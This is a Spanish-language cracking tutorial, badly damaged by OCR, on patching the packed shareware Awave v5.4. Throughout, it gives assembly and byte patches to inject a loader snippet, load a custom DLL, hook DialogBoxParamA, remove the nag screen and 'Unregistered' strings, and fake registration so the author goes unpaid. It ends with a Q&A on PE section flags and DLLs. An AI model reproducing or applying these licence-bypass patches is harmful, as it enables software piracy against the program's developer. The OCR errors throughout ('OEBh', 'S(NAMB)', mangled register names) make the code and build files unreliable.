New!Instruction2 db 068h,000h,004h,040h,000h,0C3h 
NewlInstruction3 db OEBh,019h 

PatchVA1 dd 0050BOB7h 

Patch VA2 dd 0050B54Bh 


init: 

; Restaurar en SOBOB7h "add eax [ebp+004450AC]" 
pushad lea esi,OldInstruction] 

mov edi,PatchVA 1 

mov ecx,6 rep movsb 

; Escribir en 50B34Bh "push 00400400h - ret" 
lea esi,NewInstruction2 

mov edi,PatchVA2 

mov ecx,6 

rep movsb 

popad 

push 005OBOB7h 

ret 


write_code: 

; Resaturar código en SOBOB7h 
pushad 

lea es1,OldInstruction2 

mov edi,PatchVA2 

mov ecx,6 

rep movsb 

; Eliminar NAG: Saltarse la llamada a DialogBoxParamA 
mov edi,0045041Ah 

lea esi,NewInstruction3 

mov ecx,2 

rep movsb 

; Permitir guardar más de un archivo 
mov edi,455EFDh 

mov byte ptr [edi], OEBh 

; Tegresar 

popad 

push 0050BOB7h 

ret 


Hemos agregado aquí: 


1. El código que restaura la instrucción que cambiamos en el primer desempacador. 
2. La rutina que sobrescribe la instrucción al final del segundo desempacador. 
3. La rutina que restaura la instrucción anterior. 


Antes de escribir este código en la ventana de edición de SC y ensamblarlo, necesitamos configurar el 
programa. En las opciones generales ("Action/Options), he empleado TASM. En las opciones del 
proyecto ("Action/Project Options")debes colocar la dirección del recorte: "Snippet VA" = 00443140. 


Después de gran cantidad de pruebas, noté que no se pueden escoger ciertas opciones ya que por algún 
motivo dañan el ejecutable. Así que parte del trabajo tendremos que hacerlo manualmente. Debemos 
escoger las siguientes opciones, para evitar que Snipet Creator escriba sobre el ejecutable: 


- Patch Into Existing Section 
- No Redirection 
- Don't Return Control to Program 


Otro cosa importante que debemos hacer es cambiar los atributos de las secciones que serán sobre- 
escritas durante la ejecución del proceso. De lo contrario, se cometerá error de protección. Estas 
secciones son, para awave, .adata, .text y .data. Esto lo hacemos fácilmente con SC. Abrimos "Section 
Information" ("PE Info/View Section Info"). Con el botón derecho del ratón pulsamos sobre cada una de 
estas secciones. Elegimos "Edit Section" en el menú. Saldrá la ventana "Modify Section Values". 
Pulsamos el botón "..." al lado de "Caractheristics” y en la ventana "Section Characteristics" establecemos 
"IMAGE_SCN_MEM_WRITE", lo cual permitirá que se pueda sobreescribir la sección cuando está en 
memoria.. SAVE. 


Ahora escribimos el código de arriba, lo ensamblamos y lo exportamos. 


Abrimos el archivo .BIN exportado con el editor hexadecimal lo copiamos y lo pegamos cuidadosamente 
en el archivo ejecutable en la dirección que hemos elegido para el recorte. No debemos copiar de más ni 
de menos; tampoco debemos comernos algún byte cuando peguemos el nuevo recorte, cualquier mínimo 
error deteriora el ejecutable. Antes de hacer cualquier otro cambio ejecuta el programa para constatar que 
no lo haz deteriorado. 


El copiado del recorte he tenido que hacerlo manulamente porque en varias ocasiones se me deterioró 
cuando lo hice con SC. 


Ahora escribimos el siguiente código en el desplazamiento correspondiente al final del primer 
desempacador: en la dirección 00500BB7h cuyo desplazamiento en el archivo es 0540B7h: 


68 00 40 31 4400 = push 00443140h 
C3 = ret 


No ejecutes el programa todavía. Esto debería marchar bien, pero no hemos contado con que el espacio 


que hemos elegido para colocar el recorte será sobreescrito cuando el programa quede desempaquetado 
(grrr...). Entonces, cuando por segunda vez el programa original devuelva el control al recorte ya en la 
dirección del recorte no estará el código que escribimos sino el código del programa original. 


Podríamos hacer muchas pruebas y cálculos para determinar si podemos colocar el recorte en alguna 
sección donde no vaya a ser sobreescrito por el archvo original al desempacarse. Si creamos una sección 
nueva tenemos grades posibiidades de deteriorar el archivo además de que aumentamos su tamaño. Así 
que lo que hice fue implementar una DLL. Esto facilita las cosas enormemente. 


Ahora la estrategia es re-escribir el recorte para que sólo haga los siguiente: 


1. restaurar la dirección original 
2. cargar nuestra DLL en el espacio de direcciones del proceso. 
3. cambiar la dirección del final del segundo desempacador para que pase el control a la DLL: 


extrn LoadLibraryA: Proc 
extrn GetProcAddress: Proc 


jmp init 


DliName db "aw_patch.dll",0 FunctionName db "patch",0 
OldInstruction db 08Bh,085h,0B5h,050h,044h,000h 
NewInstruction db 068h,000h,000h,000h,000h,0C3h 
NewInstruction3 db OEBh,019h 

FunctionName db 'patch",0 


init: 

; Restaurar antigua instrucción 

pushad 

mov edi,0050BOB7h 

lea esi,OldInstruction 

mov ecx,6 

rep movsb 

; Cargar librería y obtener su dirección en la memoria 
lea esi,DlIName 

call LoadLibraryA,esi 

call GetProcAddress,eax,offset FunctionName 

; Escribir nueva instrucción: entregará el control a la DLL 
mov edi,0050B54Bh 

lea esi,NewInstruction mov 

dword ptr [esi+1],eax ; Dir de DLL en la memoria 
mov ecx,6 

rep movsb 

; Regresar 


popad 
push 0050BOB7h 
ret 


Esto nos abre enormes posibilidades ya que nos permite disfrutar de todas las ventajas de usar DLLs. 
Ahora sólo será necesario colocar el recorte que cargue la DLL en el espacio de direcciones del proceso y 
luego el código de la DLL hará lo que, por razones de espacio, no puede hacer el recorte. Esto nos 
permitirá hacer cambios posteriores sin tener que tocar para nada el archivo original. Para introducir un 
cambio sólo necesitamos cambiar el código de la DLL. ¡Y todo esto sólo con un pequeño parchesito que 
carga la DLL en la memoria del proceso original!. 


La DLL debe hacer lo siguiente: 


1. restaurar la dirección original. 
2. realizar todos los parches. 


.386 

locals 

jumps 

.model flat, STDCALL 


extrn GetModuleHandleA:Proc 
extrn GetProcAddress:Proc 
IDOK equ 1 

IDM_ABOUT equ 0105 


public patch 
public RestaureDialog 


«data 

OldInstruction db 003h,085h,0ACh,050h,044h,000h 
NewInstruction db OEBh,019h 

ModuleName db 'aw_patch.dll',0 

FunctionName db 'RestaureDialog',0 


.code 

Start: 

dll proc instance: DWORD, reason:DWORD, reserved:DWORD 
mov eax, l 

ret 

endp dll 


; Rutina que parcha la víctima 
patch: 

; Resaturar código en 50B54Bh 
pushad 

lea esi,OldInstruction 

mov edi,0050B54Bh 

mov ecx,6 

rep movsb 


; Eliminar NAG: saltarse la llamada a DialogBoxParamA 
mov edi,0045041Ah 

lea esi,New!Instruction 

mov ecx,2 

rep movsb 


; Permitir guardar más de un archivo 
mov edi,455EFDh 
mov byte ptr [edi],OEBh 


; Tegresar 
popad 


push 00S5OBOB7h 
ret 


Con esta estrategia también se podrían ampliar enormemente las funcionalidades del programa. 


Ahora escribimos el nuevo recorte, lo ensamblamos y los exportamos. Abrimos awave.bin con el editor 
hexadecimal y lo pegamos en la dirección correspondiente. 


Ensamblamos y enlazamos aparte nuestra DLL. Para ello pueden emplearse los siguientos archivos: 


LIBRARY aw_patch 
EXPORTS MyAboutDialog 
EXPORTS patch 


DESCRIPTION 'ASM program' 

EXETYPE WINDOWS 

CODE PRELOAD MOVEABLE 

DATA PRELOAD MOVEABLE MULTIPLE 


NAME = aw_patch 
OBJS = S(NAME).obj 
DEF = $S(NAMB).def 
RCS = S(NAMB).rc 
RES = S(NAMB).res 


IMPORT=CATAMibúumport32 


TASMDEBUG=/zi 
LINKDEBUG=/v 


S(NAMB).DLL: S(OBJS) S(RES) S(DEF) 
tlink32 /Tpd /aa /c S(OBJS),FS(NAME),, SUMPORT), S(DEP), S(NAME) 


.asm.obj: 
tasm32 /ml /m2 $4.asm 


.IC.res 
: brc32 -r S(NAMB).rc 


Con esto sólo tenemos que ejecutar desde la línea de comando, mietras apunta al directorio donde está los 
archivos fuentes ( CMtemplaw_parch, por ejemplo), el comando MAKE, suponiendo que tenemos en 
entorno el patch hacia el directorio donde tenemos los binarios del ensamblador. 


Una vez creada nuestra DLL, la colocamos en el mismo directorio del recorte. Ensamblado el recorte y 
pegado en la dirección indicada de la víctima, ejecutamos finalmente awave.exe: ¡Ja, ja! 


Todo el poder: intercepción de llamadas a APIs 


El plan que he trazado ha tenido el objeto de ir preparando el terreno de un próximo proyecto de 
indagación: intersección de procesos. Ya he señalado un poco las dificultades de esta técnica, que como 


la inserción de recortes, es buena para personalizar programas. Sin embargo, las dificultades que he 
mencionado no disminuyen las grandes posibilidades del parche de procesos, por ejemplo el enganche de 
llamados a funciones API de W32. Así que imaginen qué sería combinar ambas técnicas: injertos en los 
PE que intersecten los procesos y los hilos de la aplicación. 


Expliquemos esto un poco. Para intervenir sobre un programa en ejecución (a esto es lo que llamamos 
proceso) debemos interceptarlo. La intercepción de procesos necesita primero obtener el manejador del 
proceso. Debido a que el espacio de memoria asignado a cada proceso es algo a lo que teóricamente no 
debería poder accederse desde otro proceso, es una tarea un poco complicada obtener el manejador de un 
proceso remoto e interceptarlo ese proceso desde otro proceso. Si lo hacemos desde un recorte dentro del 
mismo archivo PE, se facilita la tarea, ya que la intercepción se hace desde el mismo proceso. Sólo 
tenemos que interceptar las llamadas a las funciones API que deseamos redirigir a alguna otra rutina que 
también insertemos dentro del archivo objeto. Empleando este método no necesitaríamos un cargador 
(LOADER), ya que la rutina que intersecta y la que toma el control en la intersección se encuentran en el 
mismo PE y es arrancada junto al programa cuando es cargado. 


Una de las maneras de hacer la intercepción es colocar en la variable DWORD que emplea la instrucción 
de tipo JMP DWORD PTR [XXXXXXXX] para llamar a las API en DLLs externas, la dirección de la 
rutina nueva. Cada vez que se llame en el programa a la API elegida, muestro recorte tomará el control. 


Esto no es una ficción y voy a comprobarlo. 


Algo que no hemos corregido en el rompedor para awave 5.4 es el diálogo ABOUT. Se trata de la misma 
ventana que aparece al iniciar el programa. Ahora no aparece. Escribí un código para la DLL que, en vez 
de saltarse la llamada al NAG del inicio, pasaba de nuevo el control a la DLL para que ésta restaurase de 
nuevo la llamada al diálogo ABOUT. El problema es que esta ventana delata todavía que el programa es 
Shareware y no está registrado. Una estrategia para mejorarlo, en cuanto a tamaño y contenido, podría ser 
meternos en la sección de recursos del archivo (.rsrc) y analizar las posibles modificaciones. Luego 
agregaríamos código a nuestra DLL para que parche la sección de recursos en memoria.Es un 
acercamiento importante al problema, pero para hacer esto necesitamos conocimiento de la estructura de 
la sección de recursos de un PE, cuestión que he dejado para la tercera parte de nuestro estudio. 


Implementaré otra estrategia. Para mostrar la ventana ABOUT, awave llama a la API DialogBoxParamA. 
Lo que haré es algo que comúnmente hacen los loaders: interceptar las llamadas a esta función y 
desplegar otro diálogo creado por mí. 


Para interceptar la llamada, debemos recordar que al cargar el programa W32 coloca en alguna parte de la 
sección .idata la dirección en RAM donde se encuentran cargadas las funciones que el programa importa. 
Luego llama a estas funciones con una instrucción del tipo "JMP DWORD PTR [XXXXXXXX]". El 
valor de XXXXXXXXXX es la dirección virtual donde el cargador ha puesto la dirección en memoria 
donde inicia la función importada. Una llamada a esa función puede ser Call yyyyyyyy, donde yyyyyyyy 
es la dirección donde está la instrucción del tipo "JMP DWORD PTR [XXXXXXXX]" que pasa el 
control a la API. 


Para encontrar donde el cargador guarda la dirección de DialogBoxParamA, hacemos en SICE: BPX 
DialogBoxParamA. Abrimos awave, ya crackeado inclusive. Llamamos a la ventana ABOUT. Fl1 y F12 


hasta llegar al punto donde se llama a DialogBoxParamaA: 


00450425 6A00 push 0 

00450426 6840044500 push 00450440 

0045042B 51 push ecx 

0045042C 6A22 push 22h 

0045042E 52 push edx 

0045042F FF151CB24800 call [User32!'DialogBoxParamA] 


Vemos que la llamada a DialogBoxParamaA equivale a: 

call [004824CB] 

Hacemos ahora D 4824CB y vemos en la ventana de datos una serie de valores DWORD: 
BFF6DC9 BFF64B27 BFF61A62 BFF6456D 


Estos valores son punteros a las entradas de varias funciones API importadas por AWAVE. La primera 
de ellas, la que se encuentra en la localidad 4824CBh y corresponde a la dirección donde inicia la función 
DialogBoxParama: 


BFF6 0000 = Base del módulo con las funciones a importar: USER32.DLL 
0000 6DC9 = RVA del punto de entrada de una función particular: DialogBoxParamA. 


Encontramos que el programa llama directamente a las funciones que importa, sin utilizar de manera 
indirecta la instrucción de tipo JMP DWORD PTR [004824CB], que sería el caso al llamar a 
DialogBoxParamA. El programador evitó esto y llamó directamente a esta función con 


call [004824CB]. 


Bueno, ya tenemos la dirección donde está guardada la dirección del punto de entrada de 
DialogBoxParamA: 004824CBh. Para interceptar esta función simplemente hacemos que nuestra DLL 
ponga en esta localidad un valor DWORD con la dirección del punto de entrada de la nueva función que 
haremos a tomar el control con cada llamada a DialogBoxParamA: 


«data 
WinDialogBoxParamA dd O 
function2 db 'My AboutDialog',0 


.code 
; Salvar la dirección original de DialogBoxParamA 
mov esi,dword ptr [004824CBh] ; Dir. donde se ubica punto de entrada de DialogBoxParamA 


mov WinDialogBoxParamA,esi ; Variable que guardará esta dir 
; Hacer que la función MyAboutDialog tome el control a cada llamada a DialogBoxParamA 
mov edi,offset My AboutDialog 
mov eax,hInstModuleName 
call GetProcAddress,eax,edi ; Obtener dir de My AboutDialog 
mov dword ptr esi,eax ; y reenplazarla por la dir de DialogBoxParam 


Hay varias cosas que debemos tomar en cuenta para la rutina que reemplazará las llamadas a 
DialogBoxParam: 


1, Debe tener los mismos parámetros. 
2. Debe diferenciar entre las llamadas a la ventana ABOUT y las llamadas a otras ventanas. 


Esta es la rutina que he creado para esto MASM 6.14: 


TITLE AW_PATCH.DLL: Elimina NAG de awave v5.4 y reemplaza su diálogo 
ABOUT 


.386 

.model flat, STDCALL 
includelib kernel32.1ib 
includelib user32.lib 


GetModuleHandleA proto :dword 
GetProcAddress proto :dword,:dword 
EndDialog proto :dword,:dword 


IDOK equ 1 
IDM_ABOUT equ 0105 


public patch 
public MyAboutDialog 
public Start 


«data 

OldInstruction1 db 003h,085h,0ACh,050h,044h,000h 
OldInstruction2 db 08Bh,015h,084h,0F8sh,04Ah,000h 
NewlInstruction1 db 068h,000h,000h,000h,000h,0C3h 
NewlInstruction2 db 0B8h,001h,000h,000h,000h,0EBh,010h 
ModuleName db 'aw_patch.dll',0 

WinDialogBoxParamA dd O 


FunctionName db 'MyAboutDialog',0 
DlgName db "AboutDlg",0 

hInstance dd O 

hWndIntercepted dd O 

original_esp dd O 

original_edx dd O 

counter dd O 


.code 

Start: 

dll proc instance: DWORD, reason:DWORD, reserved:DWORD 
mov eax, l 

ret dll 

endp 


patch: 

; Eliminar NAG 

; Salvar la dirección original de DialogBoxParamA 

pushad mov eax,0048B24Ch 

mov esi,dword ptr [eax] ; Dir. del puntero a DialogBoxParamA mov 
WinDialogBoxParamA,esi ; Variable que guardará esta dir 


; Hacer que My AboutDialog tome el control a cada llamada a DialogBoxParamA 
mov edi,offset FunctionName 

push offset ModuleName 

call GetModuleHandleA 

mov hInstance,eax 

push edi 

push eax 

call GetProcAddress ; Obtener dir de My AboutDialog 

mov edi,0048B24Ch 

mov dword ptr [edi],eax ; y reemplazarla por la dir de DialogBoxParam 


; Permitir guardar más de un archivo 
mov edi1,00455EFDh 
mov byte ptr [edi], OEBh 


; Borrar cadena "Unregistered Copy" 
mov edi,004A2100h 
mov byte ptr [edi],0 


; Borrar cadena "(Unreg)" 

mov edi,0049FCD3h 

mov byte ptr [edi],0 ; Restaurar código en 0050B54Bh 
mov edi,0050B54Bh 

lea esi,OldInstruction1 


mov ecx,6 

rep movsb 

; regresar 

popad 

push 0050B54Bh 
ret 


MyAboutDialog proc hInst:dword, DlgN:dword, HWp:dword, DlgP:dword, i:dword 
; Guardar la dirección de retorno 

; Verificar si es la primera llamada a DialogBoxParamA 

inc counter 

cmp counter, 1 

je pop_parameters ; Sacar los parámetros de la pila y no mostrar diálogo ; 
; Revisar si es el diálogo "ABOUT" 

mov eax,hWp 

cmp hWndIntercepted,eax 

jne call_WinDialogBoxParamaA ; Si no es, continuar normal 

; Si es el Dlg, desplegar MyDialogBox 

push 0 

push offset MyDlgProc 

push hWp 

push offset DlgName 

push hInstance 

call_ WinDialogBoxParamaA: 

call WinDialogBoxParamA 

ret 


; Si es la primera llamada, pasar por alto 
pop_parameters: 

mov eax,hWp ; Obtiene el hWp 

mov hWndIntercepted,eax 

ret 


MyAboutDialog endp 


MyDlgProc: 

pop ebx 

mov original_esp,ebx 
mov eax,dword ptr [esp+4] ; uMsg: mensaje 
cmp eax,110h 

je dlg_initdialog 

cmp eax,111h 

je dlg_ command 
cmp eax,0010h je 
dlg_close 
return_false: 

xor eax,eax 


jmp pop_it2 
dlg_initdialog: 

mov eax,l 

jmp pop_it2 

dlg command: 

mov eax,dword ptr [esp+8] 
cmp eax,l 

je dlg_close 

jmp return_false 

dlg_ close: 

push 0 

push dword ptr [esp+4] 
call EndDialog 

mov eax,l 

pop_it2: 

push original_esp 

ret 


End Start 


TITLE AW_PATCH.DLL: Elimina NAG de awave v5.4 y reemplaza su diálogo ABOUT 


.386 

locals 

jumps 

.model flat, STDCALL 


extrn GetModuleHandleA :Proc 
extrn GetProcAddress:Proc 
extrn EndDialog:Proc 


IDOK equ 1 
IDM_ABOUT equ 0105 


public patch 
public MyAboutDialog 
public Start 


.data 


OldInstruction1 db 003h,085h,0ACh,050h,044h,000h 
OldInstruction2 db 08Bh,015h,084h,0F8Sh,04Ah,000h 
NewlInstruction1 db 068h,000h,000h,000h,000h,0C3h 
NewlInstruction2 db 0B8h,001h,000h,000h,000h,0EBh,010h 
ModuleName db 'aw_patch.dll',0 
WinDialogBoxParamA dd O 

FunctionName db 'MyAboutDialog',0 

DlgName db "AboutDlg",0 

hInstance dd O 

hWndIntercepted dd O 

original_esp dd O 

original_edx dd O 

counter dd O 


.code 

Start: 

dll proc instance: DWORD, reason:DWORD, reserved:DWORD 
mov eax,l 

ret 

dll endp 


patch: 

pushad 

; Eliminar NAG 

; Salvar la dirección original de DialogBoxParamA 

mov eax,0048B24Ch 

mov esi,dword ptr [eax] ; Dir. del puntero a DialogBoxParamA 
mov WinDialogBoxParamA,esi ; Variable que guardará esta dir 
; Hacer que MyAboutDialog tome el control a cada llamada a DialogBoxParamA 
mov edi, offset FunctionmName 

push offset ModuleName 

call GetModuleHandleA 

mov hInstance,eax 

push edi 

push eax 

call GetProcAddress ; Obtener dir de MyAboutDialog 

mov ed1,0048B24Ch 

mov dword ptr [edi],eax ; y reemplazarla por la dir de DialogBoxParam 
; Permitir guardar más de un archivo 

mov edi,00455EFDh 

mov byte ptr [edi],OEBHh ; Borrar cadena "Unregistered Copy" 
mov edi,004A2100h 

mov byte ptr [edi],0 ; Borrar cadena "(Unreg)" 

mov edi,0049FCD3h 

mov byte ptr [edi],0 ; Restaurar código en 0050B54Bh 

mov edi,0050B54Bh 

lea esi,OldInstructionl 

mov ecx,6 


rep movsb 

popad 

; regresar 

push 0050B54Bh 
ret 


MyAboutDialog: 

; Guardar la dirección de retorno 

push ebp 

mov ebp,esp 

pushad ; Verificar si es la primera llamada a DialogBoxParamA 
inc counter 

cmp counter, 1 

je pop_parameters 

; Sacar los parámetros de la pila y no mostrar diálogo 

; Revisar si es el diálogo "ABOUT" 

mov eax,dword ptr [ebp+12] ; hDlg 

cmp hWndIntercepted,eax 

¡ne call_WinDialogBoxParamA ; Si no es, continuar normal 
; Si es el Dlg, desplegar MyDialogBox 

push 0 

push offset MyDlgProc 

push dword ptr [ebp+16] 

push offset DlgName 

push hInstance 

call_WinDialogBoxParamaA: 

call WinDialogBoxParamA ; 

jmp ready_MyDialog ; Si es la primera llamada, pasar por alto 
pop_parameters: 

mov eax,dword ptr [ebp+12] ; Obtiene el hWnd original 
mov hWndIntercepted,eax 

ready_MyDialog: 

popad 

pop ebp 

ret 20 


MyDlgProc: 

pop ebx 

mov original_esp,ebx 
mov eax,dword ptr [esp+4] ; uMsg: mensaje 
cmp eax,110h 

je dlg_initdialog 

cmp eax,111h 

je dlg_command 
cmp eax,0010h 

je dlg_close 
return_false: 

Xor eax,eax 


jmp pop_it2 dlg_initdialog: 
mov eax, l 

jmp pop_it2 

dlg command: 

mov eax,dword ptr [esp+8] 
cmp eax,l 

je dlg_close 

jmp return_false 
dlg_close: 

push 0 

push dword ptr [esp+4] 
call EndDialog 

jmp dlg_initdialog 
pop_it2: 

pop ebx 

loop pop_it2 

push original_esp 

ret 16 


End Start 


ttdefine WS_POPUP 0x80000000L 
ttdefine WS_DLGFRAME 0x00400000L 
ttdefine WS_GROUP 0x00020000L 
ttdefine IDOK 1 

ttdefine IDCANCEL 2 

ttdefine IDM_ABOUT 0105 


AW_PATCH ICON aw_patch.ico 


AboutDlg DIALOG 10, 10, 140, 92 

STYLE WS_POPUP | WS_DLGFRAME 

FONT 8, "Arial" 

( 

CTEXT "Awave v5.4", -1, 0,12,140,16 

ICON "AW_PATCH”, -1, 16,8,0,0 

CTEXT "Audio and Wavetable Instrument Coverter, Editor and Player", -1, 0,36,140, 16 


CTEXT "(c) Markus Jónsson, 1993, 1999", -1, 0,60,140,16 
DEFPUSHBUTTON "Ok", IDOK, 54, 72, 32, 14, WS_GROUP 


El código de la última parte de este tutorial está en SNIP.ZIP, junto a la AW_PATCH.DLL. En él se 
podrá detallar con mayor presición el proceso seguido. También hay un parcheador para awave.exe v5.4: 
aw45_crk.exe. Sólo hay ejecutar aw45_crk.exe en el mismo directorio de awave.exe y automáticamente 
escribirá el recorte en awave.exe. Después de ensamblar y enlazar la nueva DLL, sólo hay que colocarla 
en el mismo directorio que awave.exe y listo: AWAVE v5.4 simula ser freeware. 


Bueno, todavía no. Quedan cuestiones importantes. El programa tiene una protección de tiempo. Después 
de 30 días el programa no trabajará. Hay también varias funciones desactivadas. Lo mejor es registrarlo... 


El verdadero crack 


Para registrar el programa debes enviar un email a su autor y cancelarle no sé cuántos dólares. Luego 
recibirás a través de cualquier mecanismo un archivo .TXT o .KEY que debes abrir con el programa: 
"OptionsProgram SetuplWRegister". Este proceso es engorroso, así que puedes hacer lo siguiente para 
disfrutar el programa en toda su plenitud: 


1, En el registro de Win, en la clave HKCUSoftwarelFMJ-SoftwarelAwave: 
Crear nuevo valor de cadena: Username "mi nombre" 


2. Aplicar los parches 


En 0047EFCC 7540 jnz 0047F00E 
Poner 0047EFCC EB0D ¡mp 0047EFDB 


En 0047EFEC 7405 JZ 0047E7F3 
Poner 0047EFEC EB09 0047EFF3 


Los parches no se pueden hacer directamente porque el archivo está empaquetado. Entonces, 
aprovechando que ya hemos parchado el archivo para que pase el control a aw_patch.dll, simplemente 
escribimos la dll para que haga los parches: 


TITLE AW_PATCH.DLL: Registra el programa awave v5.4 


.386 


.model flat, STDCALL 


public patch 
public Start 


.data 
OldInstruction db 003h,085h,0ACh,050h,044h,000h 


.code 

Start: 

dll proc instance: DWORD, reason:DWOROD, reserved: DWORD 
mov eax, l 

ret 

dll endp 


patch: 

; Parchar el target para simular registro 
pushad 

mov edi,0047EFCCh 

mov word ptr [edi],0ODEBh 

mov edi,0047EFECh 

mov word ptr [edi],009EBh 


; Restaurar código en 0050B54Bh 
mov edi,0050B54Bh 

lea esi,OldInstruction 

mov ecx,6 

rep movsb 

; Tegresar 

popad 

push 0050B54Bh 

ret 


End Start 


Sólo quea hacernos un parchador. En este caso habrá que adicionar código para que escriba en el registro 
de Windows$ el nombre del usuario. Para revisar o escribir claves en el registro Window$ suministra 
varias funciones en la librería ADVAPI32.DLL: 


RegCreateKeyEx: crea una clave en el registro; si la clave ya existe, la abre. 
RegQuery ValueEx: retorna el tipo y los datos del nombre de un valor específico asociado con una clave 
de registro abierta. 


Para introducir el nombre de usuario, hay también que implementar un cuadro de diálogo que sirva como 
interface entre el programa y el usuario que introducirá el nombre. 


Nuestro parcahador deberá: 


- abrir el archivo objeto 

- revisar si tiene el tamaño correcto 

- ubicar el punto donde se insertarán los parches. 

- revisar si no ha sido parchado ya. 

- escribir el parche. 

- desplegar un cuadro de diálogo para que el usuario introduzca su nombre de registro. 


A continuación el código: 


ALGUNAS PREGUNTAS - ALGUNAS RESPUESTAS 


¿Existen otros programas, además de Snippet Creator, que ayuden a insertar código nuevo en 
archivos ejecutables con formato PE? 


Por supuesto que sí. Otras herramientas útiles para hacer esto son: 


TOPO v1.1, de MrCrimson: herramienta excelente para añadir líneas de código a un ejecutable. Sobre 
esta herramienta, hay un tutorial disponible en WKT. 
Página web de MrCrimson: http://1.am/MrCrimson 


SADD, de Neural Noise: herramienta que agrega secciones a cualquier archivo PE cuidando el tamaño de 
la imagen, alineaciones, etc. No tan bueno como TOPO, pero también sirve. 


OPGEN_10 de Neural Noise: herramienta que genera código octal para llamadas y saltos lejanos en w32 
bit; evita la engorrosa tarea de copiar las instrucciones en ensamblador desde Softlce y evita el cálculo de 
los desplazamientos del archivo correspondientes a las direcciones virtuales de la aplicación. Lee la tabla 
de importaciones y dice el desplazamiento exacto de los diversos puntos idóneos para llamar dentro del 
vector de llamadas a APIs (no más dolores de cabeza para encontrar qué llamar cuando se invierte o se 
busca manualmete el punto para entregar el control al código nuevo cuando se quiere llamar una función 
API dentro del código de un archivo ejecutable objeto). 

Página WEB de Neural Noise: http://members.xoom.it/neural/ 


Estos programas están disponibles en http://members.xoom.com/crk10/archivos 


¿Por qué mantener el tamaño del archivo parchado es importante y en todo caso debe evitarse? 


Parte de la justificación del uso de ASM es mantener los programas en un tamaño lo más pequeño 
posible. Claro que ahora no existen los límites en cuanto a disco duro y esas cosas. Pero mientras más 
pequeño, más rápidos, menos memoria consumida, etc. Pero además de eso hay otras cuestiones. Si 
mantenemos el tamaño del archivo, sin crear una nueva sección, el recorte es prácticamente indetectable. 
Prefiero crear las nuevas secciones, si se necesitan, en una nueva DLL. El recorte sólo ahorra el trabajo 
de insertar una DLL en un proceso remoto, que es lo que hacen muchos LOADERS. Se trata de combinar 
el método de las LOADERS con el de los recortes. 


Además, cuando nos metemos con archivos empaquetados, encontramos que el programa revisa el 
tamaño del archivo para comprobar si está descomprimido: un byte de más o de menos y deterioras el 
ejecutable. Pregúntenle a quienes se han dado de cabeza con AWAVE. 


¿Las j¡mp de las apis están siempre en secciones .text? 


Creo que no necesariamente. Por el trabajo con SC y por un post en el foro Spanish Reverse Engineering 
me he enterado que los nombres importados no tienen que estar en la sección .idata. Los programas W32 
trabajan con un modelo de memoria FLAT; es como un archivo DOS ,COM, pero sin el límite estrecho 
de 65 KB: el límite son 4 GB. Todo está un gran segmento de 4 GB. Datos y Código puede ir en 
cualquier parte. El único límite, hasta dónde he visto, son precisamente los atributos de las secciones 
donde se ubican los datos brutos. Por eso, yo creo, aunque no lo he probado, que uno puede poner en una 
sección de datos inicializados lo siguiente: 


THUNKI: ¡mp [api_address] 
Y llamar a la API desde una instrucción así: 
call THUNK1 


En teoría debería trabajar. No lo he probado todavía. 


¿Cuál es el significado de las características de las secciones? Todavía no entiendo porque 
modificándolas, también se modifica la carga del ejecutable (y se despliega el Sice en la primera 
instrucción). 


He adelantado alguito antes. Las PCs están basadas en una arquitectura llamada von Newmann. Si 
quieres saber quien es este tipo te lo envío. Se le considera erróneamente el padre de la computadora 
moderna. La verdad es que fue un matemático bestial, muy activo durante la 2da. Guerra. Fue uno de los 
impulsores del proyecto ENIAC, si no me equivoco. Necesitaban computadoras para cálculos avanzados 
y, especialmente para crackear claves y mensajes. De ahí salió también la cibernética de Norbert Wiener. 
Más importante en esta arquitectura, para mí, es A. Turing, el de la máquina universal. 


Lo cierto es que el descubrimiento de estos tipos fue el tratamiento del código de un programa como si 
fueran sus datos. Gracias a esto, se pueden almacenar las secuencias de instrucciones como si fueran 
datos. W32 le saca la punta a esto y aprovecha el modelo de memoria FLAT de los procesadores INTEL 
x86. Ya te he explicado qué es este modelo. Hay más info en las referencias de los procesadores de este 
tipo. Ahora bien, como cualquier cosa puede ser dato, incluso el código, a cada sección del PE se le dan 
algunos atributos durante el enlazado para discriminar un poco entre lo que es dato y lo que es código, 
donde puede escribirse y donde no, etc. Cuando un archivo es comprimido, a las secciones se le dan 
atributos de datos, por lo que el depurador, que sólo lee código, no las leerá. Es más, si le das a las 
secciones de datos atributos de código, te las desplegará hasta el W32DASM. 


La siguiente tabla ilustra el significado de las características: 


- 0O0000020h __ Código. 

- 000000040h __ Datos inicializados. 

- 000000080h __Datos no inicializados. 

- 040000000h __Sección cacheable. 

- 080000000h __Sección paginable. 

- 100000000h __Sección compartida. 

- 200000000h _ Ejecutable. 

- 400000000h __Se puede leer. 

- 800000000h __Se puede escribir en la sección. 


Por ejemplo, si las características es ED000020H, entonces se trata de una sección en la que 


1. se pueden escribir datos 80000000h 


2. se pueden leer datos 40000000h 
3. se pueden compartir datos  10000000h 
4. hay código 00000020h 

E0000020h 


¿Qué es una DLL y para qué sirve? ¿cómo se crea? 


DLL es la extensión de archivos empleados por Window$ para enlace dinámico. DLL es la abreviatura de 
Dinamic Link Library, que significa librería de enlace dinámico. 


Un archivo DLL está compuesto por un conjunto de funciones y rutinas que pueden ser empleadas y 
llamadas desde un archivo ejecutable .EXE o desde cualquier otra .DLL. El uso de estas funciones se 
llama enlace dinámico porque se trata de un "enlace" semejante al realizado cuando enlazamos archivos 
.OBJ y .RES con el enlazador (linker) para crear ejecutables .EXE, pero que ocurre en tiempo de 
ejecución y sin el uso de enlazador. 


Esto fue implementado por Window$ considerando que muchas rutinas empleadas por varios programas 
eran las mismas. Para evitar perdida de espacio de memoria, Window$ reúne esas rutinas comunes en 
archivos DLL que pueden ser accedidas, una vez cargadas en el área de memoria compartida de un 


proceso, por más de un programa o proceso. 


Pero las DLL no sólo ahorran espacio de memoria útil. También ofrecen otras ventajas. Cómo se 
encuentran en un área de memoria compartida del proceso, son una vía de acceso a proyectos remotos. Es 
algo complejo, pero se puede hacer. Además de esto, las DLL permiten agregar codigo a un programa sin 
tener que cambiar el ejecutable para nada: se podría hacer actualizaciones importantes de programas sólo 
cambiando una DLL. 


¿Cómo escribir una DLL? 


Toda DLL tiene un punto de entrada el cual será llamado por Win cada vez que 


- la DLL sea cargada 
- la DLL sea descargada 
- un hilo sea creado en el mismo proceso 


Este es un ejemplo del código del punto de entrada de una DLL: 


DIIEntry proc hInstDLL:HINSTANCE, reason:DWORD, reserved1: DWORD 
mov eax, TRUE 
ret DIlEntry Endp 


